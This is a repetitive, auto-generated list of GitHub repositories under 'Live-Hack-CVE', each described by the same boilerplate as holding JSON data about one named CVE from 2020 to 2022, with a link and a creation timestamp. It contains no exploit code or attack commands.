**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-21594 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-21594](https://github.com/Live-Hack-CVE/CVE-2020-21594) create time: 2022-12-24T01:17:00Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-21604 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-21604](https://github.com/Live-Hack-CVE/CVE-2020-21604) create time: 2022-12-24T01:16:56Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-21606 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-21606](https://github.com/Live-Hack-CVE/CVE-2020-21606) create time: 2022-12-24T01:16:27Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-21602 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-21602](https://github.com/Live-Hack-CVE/CVE-2020-21602) create time: 2022-12-24T01:16:23Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-21600 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-21600](https://github.com/Live-Hack-CVE/CVE-2020-21600) create time: 2022-12-24T01:16:20Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-21598 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-21598](https://github.com/Live-Hack-CVE/CVE-2020-21598) create time: 2022-12-24T01:16:17Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-21596 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-21596](https://github.com/Live-Hack-CVE/CVE-2020-21596) create time: 2022-12-24T01:16:14Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-21597 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-21597](https://github.com/Live-Hack-CVE/CVE-2020-21597) create time: 2022-12-24T01:16:10Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-21605 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-21605](https://github.com/Live-Hack-CVE/CVE-2020-21605) create time: 2022-12-24T01:16:07Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-21603 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-21603](https://github.com/Live-Hack-CVE/CVE-2020-21603) create time: 2022-12-24T01:16:04Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-21601 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-21601](https://github.com/Live-Hack-CVE/CVE-2020-21601) create time: 2022-12-24T01:16:00Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-21595 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-21595](https://github.com/Live-Hack-CVE/CVE-2020-21595) create time: 2022-12-24T01:15:57Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-36447 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-36447](https://github.com/Live-Hack-CVE/CVE-2020-36447) create time: 2022-12-24T01:14:16Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-36608 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-36608](https://github.com/Live-Hack-CVE/CVE-2020-36608) create time: 2022-12-24T00:37:58Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-4099 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-4099](https://github.com/Live-Hack-CVE/CVE-2020-4099) create time: 2022-12-24T00:37:39Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-6019 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-6019](https://github.com/Live-Hack-CVE/CVE-2020-6019) create time: 2022-12-24T00:35:54Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-4301 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-4301](https://github.com/Live-Hack-CVE/CVE-2020-4301) create time: 2022-12-24T00:34:53Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-22818 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-22818](https://github.com/Live-Hack-CVE/CVE-2020-22818) create time: 2022-12-24T00:34:10Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-22820 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-22820](https://github.com/Live-Hack-CVE/CVE-2020-22820) create time: 2022-12-24T00:33:20Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-22819 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-22819](https://github.com/Live-Hack-CVE/CVE-2020-22819) create time: 2022-12-24T00:33:13Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-14361 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-14361](https://github.com/Live-Hack-CVE/CVE-2020-14361) create time: 2022-12-24T00:32:57Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-14362 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-14362](https://github.com/Live-Hack-CVE/CVE-2020-14362) create time: 2022-12-24T00:32:54Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-13410 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-13410](https://github.com/Live-Hack-CVE/CVE-2020-13410) create time: 2022-12-23T23:50:17Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-13963 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-13963](https://github.com/Live-Hack-CVE/CVE-2020-13963) create time: 2022-12-23T23:50:14Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-13422 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-13422](https://github.com/Live-Hack-CVE/CVE-2020-13422) create time: 2022-12-23T23:50:11Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-23533 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-23533](https://github.com/Live-Hack-CVE/CVE-2020-23533) create time: 2022-12-23T23:50:00Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-23036 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-23036](https://github.com/Live-Hack-CVE/CVE-2020-23036) create time: 2022-12-23T23:49:57Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-23050 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-23050](https://github.com/Live-Hack-CVE/CVE-2020-23050) create time: 2022-12-23T23:49:35Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-40661 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-40661](https://github.com/Live-Hack-CVE/CVE-2021-40661) create time: 2022-12-24T01:20:27Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-38399 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-38399](https://github.com/Live-Hack-CVE/CVE-2021-38399) create time: 2022-12-24T01:18:03Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-38397 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-38397](https://github.com/Live-Hack-CVE/CVE-2021-38397) create time: 2022-12-24T01:17:59Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-38395 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-38395](https://github.com/Live-Hack-CVE/CVE-2021-38395) create time: 2022-12-24T01:17:56Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-38191 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-38191](https://github.com/Live-Hack-CVE/CVE-2021-38191) create time: 2022-12-24T01:14:10Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-43267 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-43267](https://github.com/Live-Hack-CVE/CVE-2021-43267) create time: 2022-12-24T01:14:06Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-37789 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-37789](https://github.com/Live-Hack-CVE/CVE-2021-37789) create time: 2022-12-24T00:39:17Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-22057 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-22057](https://github.com/Live-Hack-CVE/CVE-2021-22057) create time: 2022-12-24T00:35:48Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-20468 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-20468](https://github.com/Live-Hack-CVE/CVE-2021-20468) create time: 2022-12-24T00:34:49Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-39045 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-39045](https://github.com/Live-Hack-CVE/CVE-2021-39045) create time: 2022-12-24T00:34:40Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-39009 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-39009](https://github.com/Live-Hack-CVE/CVE-2021-39009) create time: 2022-12-24T00:34:37Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-29823 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-29823](https://github.com/Live-Hack-CVE/CVE-2021-29823) create time: 2022-12-24T00:34:33Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-28879 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-28879](https://github.com/Live-Hack-CVE/CVE-2021-28879) create time: 2022-12-24T00:34:06Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-31162 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-31162](https://github.com/Live-Hack-CVE/CVE-2021-31162) create time: 2022-12-24T00:34:03Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-28877 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-28877](https://github.com/Live-Hack-CVE/CVE-2021-28877) create time: 2022-12-24T00:34:00Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-28878 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-28878](https://github.com/Live-Hack-CVE/CVE-2021-28878) create time: 2022-12-24T00:33:33Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-22235 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-22235](https://github.com/Live-Hack-CVE/CVE-2021-22235) create time: 2022-12-24T00:33:30Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-28876 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-28876](https://github.com/Live-Hack-CVE/CVE-2021-28876) create time: 2022-12-24T00:33:26Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-28875 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-28875](https://github.com/Live-Hack-CVE/CVE-2021-28875) create time: 2022-12-24T00:33:23Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-22940 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-22940](https://github.com/Live-Hack-CVE/CVE-2021-22940) create time: 2022-12-24T00:32:40Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-22930 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-22930](https://github.com/Live-Hack-CVE/CVE-2021-22930) create time: 2022-12-24T00:32:37Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-43466 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-43466](https://github.com/Live-Hack-CVE/CVE-2021-43466) create time: 2022-12-24T00:32:23Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-45341 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-45341](https://github.com/Live-Hack-CVE/CVE-2021-45341) create time: 2022-12-24T00:32:20Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-45448 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-45448](https://github.com/Live-Hack-CVE/CVE-2021-45448) create time: 2022-12-24T00:30:37Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-45447 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-45447](https://github.com/Live-Hack-CVE/CVE-2021-45447) create time: 2022-12-23T23:59:15Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-44862 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-44862](https://github.com/Live-Hack-CVE/CVE-2021-44862) create time: 2022-12-23T23:59:12Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-45446 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-45446](https://github.com/Live-Hack-CVE/CVE-2021-45446) create time: 2022-12-23T23:59:02Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-36906 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-36906](https://github.com/Live-Hack-CVE/CVE-2021-36906) create time: 2022-12-23T23:58:28Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-27815 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-27815](https://github.com/Live-Hack-CVE/CVE-2021-27815) create time: 2022-12-23T23:56:37Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-41159 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-41159](https://github.com/Live-Hack-CVE/CVE-2021-41159) create time: 2022-12-23T23:56:33Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-43221 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-43221](https://github.com/Live-Hack-CVE/CVE-2022-43221) create time: 2022-12-24T01:22:10Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-43223 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-43223](https://github.com/Live-Hack-CVE/CVE-2022-43223) create time: 2022-12-24T01:22:07Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-43222 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-43222](https://github.com/Live-Hack-CVE/CVE-2022-43222) create time: 2022-12-24T01:22:03Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3800 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3800](https://github.com/Live-Hack-CVE/CVE-2022-3800) create time: 2022-12-24T01:22:00Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3799 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3799](https://github.com/Live-Hack-CVE/CVE-2022-3799) create time: 2022-12-24T01:21:57Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3798 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3798](https://github.com/Live-Hack-CVE/CVE-2022-3798) create time: 2022-12-24T01:21:54Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3801 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3801](https://github.com/Live-Hack-CVE/CVE-2022-3801) create time: 2022-12-24T01:21:50Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3802 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3802](https://github.com/Live-Hack-CVE/CVE-2022-3802) create time: 2022-12-24T01:21:47Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3804 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3804](https://github.com/Live-Hack-CVE/CVE-2022-3804) create time: 2022-12-24T01:21:23Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3803 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3803](https://github.com/Live-Hack-CVE/CVE-2022-3803) create time: 2022-12-24T01:21:19Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-43361 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-43361](https://github.com/Live-Hack-CVE/CVE-2022-43361) create time: 2022-12-24T01:21:03Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-23738 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-23738](https://github.com/Live-Hack-CVE/CVE-2022-23738) create time: 2022-12-24T01:21:00Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-43085 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-43085](https://github.com/Live-Hack-CVE/CVE-2022-43085) create time: 2022-12-24T01:20:56Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-43362 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-43362](https://github.com/Live-Hack-CVE/CVE-2022-43362) create time: 2022-12-24T01:20:53Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-2474 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-2474](https://github.com/Live-Hack-CVE/CVE-2022-2474) create time: 2022-12-24T01:20:50Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-32865 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-32865](https://github.com/Live-Hack-CVE/CVE-2022-32865) create time: 2022-12-24T01:20:47Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-2475 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-2475](https://github.com/Live-Hack-CVE/CVE-2022-2475) create time: 2022-12-24T01:20:44Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-32866 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-32866](https://github.com/Live-Hack-CVE/CVE-2022-32866) create time: 2022-12-24T01:20:40Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-32867 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-32867](https://github.com/Live-Hack-CVE/CVE-2022-32867) create time: 2022-12-24T01:20:37Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-32870 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-32870](https://github.com/Live-Hack-CVE/CVE-2022-32870) create time: 2022-12-24T01:20:34Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-27583 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-27583](https://github.com/Live-Hack-CVE/CVE-2022-27583) create time: 2022-12-24T01:20:31Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-32875 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-32875](https://github.com/Live-Hack-CVE/CVE-2022-32875) create time: 2022-12-24T01:20:24Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-32879 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-32879](https://github.com/Live-Hack-CVE/CVE-2022-32879) create time: 2022-12-24T01:20:21Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-32903 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-32903](https://github.com/Live-Hack-CVE/CVE-2022-32903) create time: 2022-12-24T01:19:53Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-32915 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-32915](https://github.com/Live-Hack-CVE/CVE-2022-32915) create time: 2022-12-24T01:19:50Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-32914 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-32914](https://github.com/Live-Hack-CVE/CVE-2022-32914) create time: 2022-12-24T01:19:45Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-32944 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-32944](https://github.com/Live-Hack-CVE/CVE-2022-32944) create time: 2022-12-24T01:19:42Z

